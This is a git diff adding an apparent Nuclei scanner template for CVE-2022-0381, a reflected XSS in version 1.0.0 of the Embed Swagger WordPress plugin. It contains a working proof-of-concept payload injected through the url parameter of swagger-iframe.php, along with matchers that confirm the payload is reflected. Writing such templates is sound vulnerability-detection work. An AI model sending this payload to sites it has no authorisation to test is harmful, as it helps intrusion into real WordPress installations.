diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml new file mode 100644 index 0000000000..c467531f95 --- /dev/null +++ b/cves/2022/CVE-2022-0381.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0381 + +info: + name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS + author: edoardottt + severity: medium + description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0381 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0381 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381 + tags: cve,cve2022,swagger,xss,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "url: \"xss://\"-alert(document.domain)" \ No newline at end of file